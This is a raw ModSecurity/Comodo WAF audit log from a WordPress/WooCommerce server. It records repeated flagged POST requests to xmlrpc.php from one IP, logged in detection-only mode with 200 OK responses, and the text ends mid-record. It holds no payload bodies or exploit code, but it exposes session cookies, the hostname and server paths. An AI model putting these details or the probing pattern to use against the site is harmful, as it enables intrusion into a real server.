Set-Cookie: PHPSESSID=q86one82e5ouilksaqh69hpeoq; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_e892368cf8b9b0371b1dd0bbb677f3%7C%7C1750161435%7C%7C1750157835%7C%7C8ef0ac29a3b53164fcf9c7599f27d51a; expires=Tue, 17 Jun 2025 11:57:15 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=c87dce2544d5df0c449f2a8ea9fc9b37%7C%7C1750161436%7C%7C1750157836%7C%7C7e4215e35067a933e8971d9140040848; expires=Tue, 17 Jun 2025 11:57:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --3b3a2651-E-- --3b3a2651-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE61G1irsA1ruSKrNWSXrQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988635010121 1097921 (- - -) Stopwatch2: 1749988635010121 1097921; combined=3317, p1=399, p2=2510, p3=111, p4=35, p5=164, sr=89, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3b3a2651-Z-- --46aa4269-A-- [15/Jun/2025:17:28:16.943423 +0530] aE61V1u1-lKBbvo2E9pEYQAAAAw 165.22.247.248 47846 127.0.0.1 7081 --46aa4269-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=dub9f5cbr8cgnu6bnf87ojnrrc; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_c90ff9efc2e5932d068386a6f43117%7C%7C1750161495%7C%7C1750157895%7C%7Cb079a28a40f82a7b739aee66ceaa2ba1; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=f9974ce245ba350074ad17d810e7cb8a%7C%7C1750161495%7C%7C1750157895%7C%7Cefbcd1ea5d43b4368dbc100e23d3caa2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --46aa4269-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=1vv757s8t8osds2421gingjuhu; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_ce38f6d6080d1bba226dbcb64313ab%7C%7C1750161496%7C%7C1750157896%7C%7C0529db530d42d80072b6ecbd52b5ad5e; expires=Tue, 17 Jun 2025 11:58:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=334aa87496f505aaba71e2ef160e38d0%7C%7C1750161496%7C%7C1750157896%7C%7C172693307237d34e319dd5f2c2c1bb81; expires=Tue, 17 Jun 2025 11:58:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --46aa4269-E-- --46aa4269-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE61V1u1-lKBbvo2E9pEYQAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988695889362 1054154 (- - -) Stopwatch2: 1749988695889362 1054154; combined=3314, p1=387, p2=2406, p3=123, p4=44, p5=210, sr=90, sw=144, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --46aa4269-Z-- --eb575b34-A-- [15/Jun/2025:17:29:16.313159 +0530] aE61k1WckDejtnB0cwJa9gAAAAA 165.22.247.248 35222 127.0.0.1 7081 --eb575b34-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 Cookie: PHPSESSID=io940mpkb5min6n4gealh5efhu; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_3168b1a97eb4d9925a73c15e5070ca%7C%7C1750161554%7C%7C1750157954%7C%7C9c111df01b45578574faa73c5ca48a15; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=81610c634009635f708778cfe39c9a1b%7C%7C1750161555%7C%7C1750157955%7C%7C651e0d931dfbe1ca02f9fe385e8d50b4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --eb575b34-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=ie3l467d77o26itc85sbau7k4e; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_bf9fcb77c529cc057f508cd280d454%7C%7C1750161556%7C%7C1750157956%7C%7C57e193c3fdb291032c4dfc3a5d85b717; expires=Tue, 17 Jun 2025 11:59:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=c5277143891c0497ce6be9a051605e03%7C%7C1750161556%7C%7C1750157956%7C%7C1ebff64da167bf36f34b7f16089312e1; expires=Tue, 17 Jun 2025 11:59:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --eb575b34-E-- --eb575b34-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE61k1WckDejtnB0cwJa9gAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988755295074 1018168 (- - -) Stopwatch2: 1749988755295074 1018168; combined=3056, p1=373, p2=2257, p3=122, p4=34, p5=165, sr=90, sw=105, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eb575b34-Z-- --befb4d31-A-- [15/Jun/2025:17:30:16.812188 +0530] aE61zw2U8ofTdsKp_yhN7QAAAAU 165.22.247.248 56320 127.0.0.1 7081 --befb4d31-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 Cookie: PHPSESSID=v9sp2otk0akdtasuv39m10jkcf; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_f82467ae0ef5d24fd0fe3aa9d4e37b%7C%7C1750161615%7C%7C1750158015%7C%7C94637c2209976e699d9c2d71aca57b47; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=a49913d518edf148b5d6ea18854a81c0%7C%7C1750161615%7C%7C1750158015%7C%7Cb3fe44b5543666540a75a4db79b18bca User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --befb4d31-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=6340kjr0cnalg01f98lqc83avh; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_38293ce044f36dee2fe55538bc3958%7C%7C1750161616%7C%7C1750158016%7C%7Cde8299490646b6f29323b933b6a13e6d; expires=Tue, 17 Jun 2025 12:00:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=2fe21166ca97aac9a5b799d2679a23fa%7C%7C1750161616%7C%7C1750158016%7C%7C4d90b97bf95db67bb8ce1ad8f91b58cf; expires=Tue, 17 Jun 2025 12:00:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --befb4d31-E-- --befb4d31-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE61zw2U8ofTdsKp_yhN7QAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988815565938 1246358 (- - -) Stopwatch2: 1749988815565938 1246358; combined=71071, p1=382, p2=2248, p3=96, p4=37, p5=34189, sr=96, sw=34119, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --befb4d31-Z-- --a807b87a-A-- [15/Jun/2025:17:31:17.401723 +0530] aE62DBBkCBNeXruntvqkrwAAAAs 165.22.247.248 52430 127.0.0.1 7081 --a807b87a-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 Cookie: PHPSESSID=o3sj8igdjfljcnotukj3ri8i9k; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_f3bad68d3de33bd1f559a36502056b%7C%7C1750161675%7C%7C1750158075%7C%7Ce741cb699261217d57bd4be8c08f53d7; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=f2cd13603fb825fa210479a6343dc765%7C%7C1750161675%7C%7C1750158075%7C%7C548379671f9b4c0e190a96e2a8b6290d User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --a807b87a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=p61llk5nks47h0oldcvh2q8rmu; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_a49a11f46946edee93ec55a04885f1%7C%7C1750161677%7C%7C1750158077%7C%7Cdadccb515354a100a42b15658eb4126c; expires=Tue, 17 Jun 2025 12:01:17 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=9f789b3662520cc2ad2b6b3716813aa8%7C%7C1750161677%7C%7C1750158077%7C%7Ceda81f301aad7cc3fa25a5efc35e25a3; expires=Tue, 17 Jun 2025 12:01:17 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a807b87a-E-- --a807b87a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE62DBBkCBNeXruntvqkrwAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988876207014 1194826 (- - -) Stopwatch2: 1749988876207014 1194826; combined=3263, p1=418, p2=2411, p3=83, p4=55, p5=191, sr=102, sw=105, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a807b87a-Z-- --7bc5927e-A-- [15/Jun/2025:17:32:17.132134 +0530] aE62SA2U8ofTdsKp_yhOMQAAAAU 165.22.247.248 35172 127.0.0.1 7081 --7bc5927e-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=ij1ns57hko01sq7ok6hjvkqil5; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_58ea572eb6bfbcb307e9c8a757450b%7C%7C1750161735%7C%7C1750158135%7C%7Cb11616232764aba450aa29aa19c8e726; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=9050775f310879315bde6462066ab013%7C%7C1750161735%7C%7C1750158135%7C%7C99a16f1e8d606f192ab436f4bc47cb15 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --7bc5927e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=otcso7d3hkb5486gemg90l79l2; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_4f1b98cdc0b095311a13a709226036%7C%7C1750161736%7C%7C1750158136%7C%7C50c16a14e4321cf8039f86898c5fa00c; expires=Tue, 17 Jun 2025 12:02:16 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=f0627a1bed273106ecdf6e5fdb2fcdab%7C%7C1750161737%7C%7C1750158137%7C%7C2307d659018c77f125cb70dfa45530ed; expires=Tue, 17 Jun 2025 12:02:17 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7bc5927e-E-- --7bc5927e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE62SA2U8ofTdsKp_yhOMQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988936068032 1064193 (- - -) Stopwatch2: 1749988936068032 1064193; combined=3080, p1=461, p2=2111, p3=144, p4=44, p5=197, sr=150, sw=123, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7bc5927e-Z-- --48805432-A-- [15/Jun/2025:17:33:17.724862 +0530] aE62hFu1-lKBbvo2E9pE3wAAAAw 165.22.247.248 51910 127.0.0.1 7081 --48805432-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=oq3l253445in0q3a7p1tntahuk; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_335362a7446668e2cbe5bfaa6935e0%7C%7C1750161796%7C%7C1750158196%7C%7C7c9787b65444cfea1a3ab14c0a830c49; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=564456bf00b7be36c7b9de9f1bd50932%7C%7C1750161796%7C%7C1750158196%7C%7C79a3811d77b38e632426cb88b11532b4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --48805432-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=7bes34nenr1ncb1grr6gafmq5d; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_35939d53ff67ea808e89fba912106b%7C%7C1750161797%7C%7C1750158197%7C%7Cd4ee527d583b3057df2c6dd0f0299806; expires=Tue, 17 Jun 2025 12:03:17 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=9a03b7e2682fdca5ef6aff498f610892%7C%7C1750161797%7C%7C1750158197%7C%7C1608ce4e4caf6742a00ed72499662898; expires=Tue, 17 Jun 2025 12:03:17 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --48805432-E-- --48805432-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE62hFu1-lKBbvo2E9pE3wAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988996677083 1047902 (- - -) Stopwatch2: 1749988996677083 1047902; combined=3960, p1=529, p2=2958, p3=115, p4=40, p5=206, sr=149, sw=112, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --48805432-Z-- --d9344339-A-- [15/Jun/2025:17:34:17.898971 +0530] aE62wFCip1xXG9qkRMdxCAAAAAc 165.22.247.248 33372 127.0.0.1 7081 --d9344339-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=uqf7bej5rdfc5gutmg69f0mi2i; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_2015e1c9ce2c27c2e848774583f7f9%7C%7C1750161856%7C%7C1750158256%7C%7Ca70d8822e086cc3dc81c3ee6f5be051f; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=dac58f45a07c7fdd3fc5cfb3ff2d3a46%7C%7C1750161856%7C%7C1750158256%7C%7C6e7c5eb3e854d45a6ca9c25b1ca79373 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --d9344339-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=okciq09fjn8mam22cru3v5eai0; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_c8f73c270abf1c1fe385d6e8704c5b%7C%7C1750161857%7C%7C1750158257%7C%7C1561c540846e4a28fbf739912ba7bed6; expires=Tue, 17 Jun 2025 12:04:17 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=1c6b17d86ca1992af81cbad5bd3f221f%7C%7C1750161857%7C%7C1750158257%7C%7C031254750121cb866bcf285230a08977; expires=Tue, 17 Jun 2025 12:04:17 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d9344339-E-- --d9344339-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE62wFCip1xXG9qkRMdxCAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749989056712629 1186424 (- - -) Stopwatch2: 1749989056712629 1186424; combined=4224, p1=557, p2=3191, p3=126, p4=41, p5=188, sr=147, sw=121, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d9344339-Z-- --c1b6f417-A-- [15/Jun/2025:17:35:17.200198 +0530] aE62_JRtBAxFAusk8b4pOgAAAAk 165.22.247.248 58324 127.0.0.1 7081 --c1b6f417-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 Cookie: PHPSESSID=bbaa273cr5m0tav7c3amjogq0j; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_644558d046a480b9211367c7859a1f%7C%7C1750161915%7C%7C1750158315%7C%7C31a905afa5590286394be8439722d1fe; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=3239360bf091c53133bb401309e61748%7C%7C1750161915%7C%7C1750158315%7C%7C3c402db2f79629fa00a3dc864e9952f6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --c1b6f417-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=o5tnikouecufr3n03tp7becugg; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_276fc9edf26d125dae226d25bbf4a4%7C%7C1750161916%7C%7C1750158316%7C%7C3060bfc9a0fcf35f45b4f38c1732fabf; expires=Tue, 17 Jun 2025 12:05:16 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=5cfc95ef135e772574ce71dff0b3f094%7C%7C1750161917%7C%7C1750158317%7C%7C41bd133bb8b068687fe2dafff1eca779; expires=Tue, 17 Jun 2025 12:05:17 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --c1b6f417-E-- --c1b6f417-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag 